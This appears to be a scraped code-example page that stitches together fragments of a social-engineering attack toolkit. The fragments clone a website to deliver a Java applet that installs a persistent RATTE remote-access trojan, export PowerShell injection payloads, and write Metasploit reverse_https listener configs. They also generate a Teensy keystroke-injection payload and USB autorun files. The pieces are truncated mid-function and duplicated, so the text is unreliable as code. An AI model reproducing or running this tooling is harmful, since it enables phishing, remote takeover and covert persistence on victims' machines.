예제 #1
0
def main():
    valid_site = False
    valid_ip = False
    valid_persistence = False
    input_counter = 0
    site_input_counter = 0

    #pause=raw_input("This module has finished completing. Press <enter> to continue")

    # Get a *VALID* website address
    while valid_site != True and site_input_counter < 3:
        website = raw_input(
            core.setprompt(["9", "2"],
                           "Enter website to clone (ex. https://gmail.com)"))
        site = urlparse.urlparse(website)

        if site.scheme == "http" or site.scheme == "https":
            if site.netloc != "":
                valid_site = True
            else:
                if site_input_counter == 2:
                    core.print_error(
                        "\nMaybe you have the address written down wrong?" +
                        core.bcolors.ENDC)
                    sleep(4)
                    return
                else:
                    core.print_warning(
                        "I can't determine the fqdn or IP of the site. Try again?"
                    )
                    site_input_counter += 1
        else:
            if site_input_counter == 2:
                core.print_error(
                    "\nMaybe you have the address written down wrong?")
                sleep(4)
                return
            else:
                core.print_warning(
                    "I couldn't determine whether this is an http or https site. Try again?"
                )
                site_input_counter += 1
        #core.DebugInfo("site.scheme is: %s " % site.scheme)
        #core.DebugInfo("site.netloc is: %s " % site.netloc)
        #core.DebugInfo("site.path is: %s " % site.path)
        #core.DebugInfo("site.params are: %s " % site.params)
        #core.DebugInfo("site.query is: %s " % site.query)
        #core.DebugInfo("site.fragment is: %s " % site.fragment)

    while valid_ip != True and input_counter < 3:
        ipaddr = raw_input(
            core.setprompt(["9", "2"],
                           "Enter the IP address to connect back on"))
        valid_ip = core.validate_ip(ipaddr)
        if not valid_ip:
            if input_counter == 2:
                core.print_error(
                    "\nMaybe you have the address written down wrong?")
                sleep(4)
                return
            else:
                input_counter += 1

    #javaport must be 80, cause applet uses in web injection port 80 to download payload!
    try:
        javaport = int(
            raw_input(
                core.setprompt(["9", "2"],
                               "Port Java applet should listen on [80]")))
        while javaport == 0 or javaport > 65535:
            if javaport == 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if javaport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            javaport = int(
                raw_input(
                    core.setprompt(["9", "2"],
                                   "Port Java applet should listen on [80]")))
    except ValueError:
        #core.print_info("Port set to default of 80")
        javaport = 80
    #javaport=80

    try:
        ratteport = int(
            raw_input(
                core.setprompt(["9", "2"],
                               "Port RATTE Server should listen on [8080]")))
        while ratteport == javaport or ratteport == 0 or ratteport > 65535:
            if ratteport == javaport:
                core.print_warning("Port must not be equal to javaport!")
            if ratteport == 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if ratteport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(
                raw_input(
                    core.setprompt(
                        ["9", "2"],
                        "Port RATTE Server should listen on [8080]")))
    except ValueError:
        ratteport = 8080

    persistent = core.yesno_prompt(
        ["9", "2"], "Should RATTE be persistentententent [no|yes]?")

    # j0fer 06-27-2012 #        while valid_persistence != True:
    # j0fer 06-27-2012 #                persistent=raw_input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
    # j0fer 06-27-2012 #                persistent=str.lower(persistent)
    # j0fer 06-27-2012 #                if persistent == "no" or persistent == "n":
    # j0fer 06-27-2012 #                        persistent="NO"
    # j0fer 06-27-2012 #                        valid_persistence = True
    # j0fer 06-27-2012 #               elif persistent == "yes" or persistent == "y":
    # j0fer 06-27-2012 #                       persistent="YES"
    # j0fer 06-27-2012 #                       valid_persistence = True
    # j0fer 06-27-2012 #                else:
    # j0fer 06-27-2012 #                       core.print_warning(text.YES_NO_RESPONSES)

    customexe = raw_input(
        core.setprompt([
            "9", "2"
        ], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))

    #######################################
    # prepare RATTE
    #######################################

    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    ######################################
    # Java Applet Attack to deploy RATTE
    #######################################

    core.print_info("Starting java applet attack...")
    java_applet_attack_tw(website, javaport, "reports/", ipaddr)

    fileopen = file("%s/src/program_junk/rand_gen" % (definepath), "r")
    for line in fileopen:
        ratte_random = line.rstrip()
    subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" %
                     (definepath, definepath, ratte_random),
                     shell=True).wait()

    #######################
    # start ratteserver
    #######################

    core.print_info("Starting ratteserver...")
    ratte_listener_start(ratteport)

    ######################
    # stop webserver
    ######################
    stop_web_server_tw()
    return
        #prep_powershell_payload()

        # create the directory if it does not exist
        if not os.path.isdir(core.setdir + "/reports/powershell"):
            os.makedirs(core.setdir + "/reports/powershell")

        # here we format everything for us
        with  open(core.setdir + "/x86.powershell") as fileopen:
            x86 = fileopen.read()
        x86 = core.powershell_encodedcommand() + x86
        core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell/")))
        with open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") as filewrite:
            filewrite.write(x86)

        choice = core.yesno_prompt("0", "Do you want to start the listener now [yes/no]: ")
        if choice == 'NO':
            pass

        # if we want to start the listener
        if choice == 'YES':
            with open(core.setdir + "/reports/powershell/powershell.rc", "w") as filewrite:
                filewrite.write("use multi/handler\n"
                                "set payload windows/meterpreter/reverse_https\n"
                                "set LPORT {0}\n"
                                "set LHOST 0.0.0.0\n"
                                "set ExitOnSession false\n"
                                "exploit -j".format(port))

            msf_path = core.meta_path()
            subprocess.Popen("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"),
Keyboard.send_now();
}
void SPRE(int KeyCode){
Keyboard.set_modifier(MODIFIERKEY_SHIFT);
Keyboard.set_key1(KeyCode);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
}
""")
print "[*] Payload has been extracted. Copying file to %s/reports/teensy.pde" % (setdir)
filewrite = file(setdir + "/reports/teensy.pde", "w")
filewrite.write(teensy)
filewrite.close()
choice = yesno_prompt("0","Do you want to start a listener [yes/no]: ")
if choice == "YES":


    # Open the IPADDR file
    if check_options("IPADDR=") != 0:
        ipaddr = check_options("IPADDR=")
    else:
        ipaddr=raw_input(setprompt(["6"], "IP address to connect back on"))
        update_options("IPADDR=" + ipaddr)

    if check_options("PORT=") != 0:
        port = check_options("PORT=")

    else:
        port = raw_input("Enter the port to connect back on: ")
def main():
        valid_site = False
        valid_ip = False
        valid_persistence = False
        input_counter= 0
        site_input_counter=0
        
        #pause=raw_input("This module has finished completing. Press <enter> to continue")
        
        # Get a *VALID* website address
        while valid_site != True and site_input_counter < 3:
                website = raw_input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
                site = urlparse.urlparse(website)
                
                if site.scheme == "http" or site.scheme == "https":
                        if site.netloc != "":
                                valid_site = True
                        else:
                                if site_input_counter == 2:
                                        core.print_error("\nMaybe you have the address written down wrong?" + core.bcolors.ENDC)
                                        sleep(4)
                                        return
                                else:
                                        core.print_warning("I can't determine the fqdn or IP of the site. Try again?")
                                        site_input_counter += 1
                else:
                        if site_input_counter == 2:
                                core.print_error("\nMaybe you have the address written down wrong?")
                                sleep(4)
                                return
                        else:
                                core.print_warning("I couldn't determine whether this is an http or https site. Try again?")
                                site_input_counter +=1
                #core.DebugInfo("site.scheme is: %s " % site.scheme)
                #core.DebugInfo("site.netloc is: %s " % site.netloc)
                #core.DebugInfo("site.path is: %s " % site.path)
                #core.DebugInfo("site.params are: %s " % site.params)
                #core.DebugInfo("site.query is: %s " % site.query)
                #core.DebugInfo("site.fragment is: %s " % site.fragment)

        while valid_ip != True and input_counter < 3:
                ipaddr = raw_input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
                valid_ip = core.validate_ip(ipaddr)
                if not valid_ip:
                        if input_counter == 2:
                                core.print_error("\nMaybe you have the address written down wrong?")
                                sleep(4)
                                return
                        else:
                                input_counter += 1
                
        #javaport must be 80, cause applet uses in web injection port 80 to download payload!
        try:
                javaport = int(raw_input(core.setprompt(["9", "2"], "Port Java applet should listen on [80]")))
                while javaport == 0 or javaport > 65535:
                        if javaport == 0:
                                core.print_warning(text.PORT_NOT_ZERO)
                        if javaport > 65535:
                                core.print_warning(text.PORT_TOO_HIGH)
                        javaport = int(raw_input(core.setprompt(["9", "2"],"Port Java applet should listen on [80]")))
        except ValueError:
                #core.print_info("Port set to default of 80")
                javaport = 80
        #javaport=80

        try:
                ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
                while ratteport == javaport or ratteport == 0 or ratteport > 65535:
                        if ratteport == javaport:
                                core.print_warning("Port must not be equal to javaport!")
                        if ratteport == 0:
                                core.print_warning(text.PORT_NOT_ZERO)
                        if ratteport > 65535:
                                core.print_warning(text.PORT_TOO_HIGH)
                        ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
        except ValueError:
                ratteport = 8080

        persistent = core.yesno_prompt(["9","2"], "Should RATTE be persistentententent [no|yes]?")

# j0fer 06-27-2012 #        while valid_persistence != True: 
# j0fer 06-27-2012 #                persistent=raw_input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# j0fer 06-27-2012 #                persistent=str.lower(persistent)
# j0fer 06-27-2012 #                if persistent == "no" or persistent == "n":
# j0fer 06-27-2012 #                        persistent="NO"
# j0fer 06-27-2012 #                        valid_persistence = True
# j0fer 06-27-2012 #               elif persistent == "yes" or persistent == "y":
# j0fer 06-27-2012 #                       persistent="YES"
# j0fer 06-27-2012 #                       valid_persistence = True
# j0fer 06-27-2012 #                else:
# j0fer 06-27-2012 #                       core.print_warning(text.YES_NO_RESPONSES)

        customexe=raw_input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))

        #######################################
        # prepare RATTE
        #######################################

        prepare_ratte(ipaddr,ratteport,persistent,customexe)

        ######################################
        # Java Applet Attack to deploy RATTE
        #######################################

        core.print_info("Starting java applet attack...")
        java_applet_attack_tw(website,javaport, "reports/",ipaddr)

        fileopen=file("%s/src/program_junk/rand_gen" % (definepath), "r")
        for line in fileopen:
                ratte_random = line.rstrip()
        subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" % (definepath,definepath,ratte_random), shell=True).wait()

        #######################
        # start ratteserver 
        #######################

        core.print_info("Starting ratteserver...")
        ratte_listener_start(ratteport)
        
        ######################
        # stop webserver 
        ######################
        stop_web_server_tw()
        return
예제 #5
0
        payload = ""

    filewrite.write(
        """[autorun]\nopen={0}\nicon=autorun.ico""".format(payload))

core.print_status(
    "Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'"
)
core.print_status(
    "Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed."
)
core.print_info("Copy the contents of the folder to a CD/DVD/USB to autorun")

# if we want to launch payload and automatically create listener
if trigger in [1, 2, 3]:
    choice1 = core.yesno_prompt("0", "Create a listener right now [yes|no]")
    if choice1.lower() == "yes" or choice1.lower() == "y":
        # if we used something to create other than solo.py then write out the
        # listener
        if not os.path.isfile(os.path.join(core.setdir, "meta_config")):
            with open(os.path.join(core.setdir, "meta_config"), 'w') as filewrite, \
                    open(os.path.join(core.setdir, "payload.options")) as fileopen:
                for line in fileopen:
                    line = line.split(" ")
                    filewrite.write("use multi/handler\n")
                    filewrite.write("set payload {0}\n".format(line[0]))
                    filewrite.write("set lhost {0}\n".format(line[1]))
                    filewrite.write("set lport {0}\n".format(line[2]))
                    filewrite.write("set ExitOnSession false\n")
                    filewrite.write("exploit -j\r\n\r\n")
Keyboard.send_now();
}
void SPRE(int KeyCode){
Keyboard.set_modifier(MODIFIERKEY_SHIFT);
Keyboard.set_key1(KeyCode);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
}
""")
print "[*] Payload has been extracted. Copying file to reports/teensy.pde"
filewrite = file("reports/teensy.pde", "w")
filewrite.write(teensy)
filewrite.close()
choice = yesno_prompt("0","Do you want to start a listener [yes/no]: ")
if choice == "YES":


    # Open the IPADDR file
    if check_options("IPADDR=") != 0:
        ipaddr = check_options("IPADDR=")
    else:
        ipaddr=raw_input(setprompt(["6"], "IP address to connect back on"))
        update_options("IPADDR=" + ipaddr)

    if check_options("PORT=") != 0:
        port = check_options("PORT=")

    else:
        port = raw_input("Enter the port to connect back on: ")
예제 #7
0
def main():
    valid_site = False
    valid_ip = False
    # valid_persistence = False
    input_counter = 0
    site_input_counter = 0
    ipaddr = None
    website = None

    # pause=input("This module has finished completing. Press <enter> to continue")

    # Get a *VALID* website address
    while not valid_site and site_input_counter < 3:
        website = input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
        site = urlparse(website)

        if site.scheme == "http" or site.scheme == "https":
            if site.netloc != "":
                valid_site = True
            else:
                if site_input_counter == 2:
                    core.print_error("\nМожет быть, вы неправильно записали адрес?" + core.bcolors.ENDC)
                    sleep(4)
                    return
                else:
                    core.print_warning("Я не могу определить fqdn или IP сайта. Попробуй снова?")
                    site_input_counter += 1
        else:
            if site_input_counter == 2:
                core.print_error("\nМожет быть, вы неправильно записали адрес?")
                sleep(4)
                return
            else:
                core.print_warning("Я не мог определить, является ли это http или https сайтом. Попробуй снова?")
                site_input_counter += 1
                # core.DebugInfo("site.scheme is: %s " % site.scheme)
                # core.DebugInfo("site.netloc is: %s " % site.netloc)
                # core.DebugInfo("site.path is: %s " % site.path)
                # core.DebugInfo("site.params are: %s " % site.params)
                # core.DebugInfo("site.query is: %s " % site.query)
                # core.DebugInfo("site.fragment is: %s " % site.fragment)

    while not valid_ip and input_counter < 3:
        ipaddr = input(core.setprompt(["9", "2"], "Введите IP-адрес для подключения"))
        valid_ip = core.validate_ip(ipaddr)
        if not valid_ip:
            if input_counter == 2:
                core.print_error("\nМожет быть, вы неправильно записали адрес?")
                sleep(4)
                return
            else:
                input_counter += 1

    # javaport must be 80, cause applet uses in web injection port 80 to download payload!
    try:
        javaport = int(input(core.setprompt(["9", "2"], "Апплет порта Java должен слушать [80]")))
        while javaport == 0 or javaport > 65535:
            if javaport == 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if javaport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            javaport = int(input(core.setprompt(["9", "2"], "Апплет порта Java должен слушать [80]")))
    except ValueError:
        # core.print_info("Port set to default of 80")
        javaport = 80

    try:
        ratteport = int(input(core.setprompt(["9", "2"], "Сервер RATTE порта должен слушать [8080]")))
        while ratteport == javaport or ratteport == 0 or ratteport > 65535:
            if ratteport == javaport:
                core.print_warning("Порт не должен быть равен javaport!")
            if ratteport == 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if ratteport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(input(core.setprompt(["9", "2"], "Сервер RATTE порта должен слушать [8080]")))
    except ValueError:
        ratteport = 8080

    persistent = core.yesno_prompt(["9", "2"], "Должен ли RATTE быть постоянным [no|yes]?")

    # j0fer 06-27-2012 #        while valid_persistence != True:
    # j0fer 06-27-2012 #                persistent=input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
    # j0fer 06-27-2012 #                persistent=str.lower(persistent)
    # j0fer 06-27-2012 #                if persistent == "no" or persistent == "n":
    # j0fer 06-27-2012 #                        persistent="NO"
    # j0fer 06-27-2012 #                        valid_persistence = True
    # j0fer 06-27-2012 #               elif persistent == "yes" or persistent == "y":
    # j0fer 06-27-2012 #                       persistent="YES"
    # j0fer 06-27-2012 #                       valid_persistence = True
    # j0fer 06-27-2012 #                else:
    # j0fer 06-27-2012 #                       core.print_warning(text.YES_NO_RESPONSES)

    customexe = input(core.setprompt(["9", "2"], "Используйте конкретное имя файла (например, firefox.exe) [filename.exe или пусто]? "))
    #######################################
    # prepare RATTE
    #######################################

    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    ######################################
    # Java Applet Attack to deploy RATTE
    #######################################

    core.print_info("Запуск атаки Java-апплета..")
    java_applet_attack_tw(website, javaport, "reports/", ipaddr)

    with open(os.path.join(userconfigpath, definepath, "/rand_gen")) as fileopen:
        for line in fileopen:
            ratte_random = line.rstrip()
        subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(userconfigpath, definepath), definepath, ratte_random), shell=True).wait()

    #######################
    # start ratteserver
    #######################

    core.print_info("Стартовый ратсервер...")
    ratte_listener_start(ratteport)

    ######################
    # stop webserver
    ######################
    stop_web_server_tw()
    return
    elif trigger == 3:
        payload = "openthis.wab"

    else:
        payload = ""

    filewrite.write("""[autorun]\nopen={0}\nicon=autorun.ico""".format(payload))

core.print_status("Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'")
core.print_status("Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.")
core.print_info("Copy the contents of the folder to a CD/DVD/USB to autorun")

# if we want to launch payload and automatically create listener
if trigger in [1, 2, 3]:
    choice1 = core.yesno_prompt("0", "Create a listener right now [yes|no]")
    if choice1.lower() == "yes" or choice1.lower() == "y":
        # if we used something to create other than solo.py then write out the
        # listener
        if not os.path.isfile(os.path.join(core.setdir, "meta_config")):
            with open(os.path.join(core.setdir, "meta_config"), 'w') as filewrite, \
                    open(os.path.join(core.setdir, "payload.options")) as fileopen:
                for line in fileopen:
                    line = line.split(" ")
                    filewrite.write("use multi/handler\n")
                    filewrite.write("set payload {0}\n".format(line[0]))
                    filewrite.write("set lhost {0}\n".format(line[1]))
                    filewrite.write("set lport {0}\n".format(line[2]))
                    filewrite.write("set ExitOnSession false\n")
                    filewrite.write("exploit -j\r\n\r\n")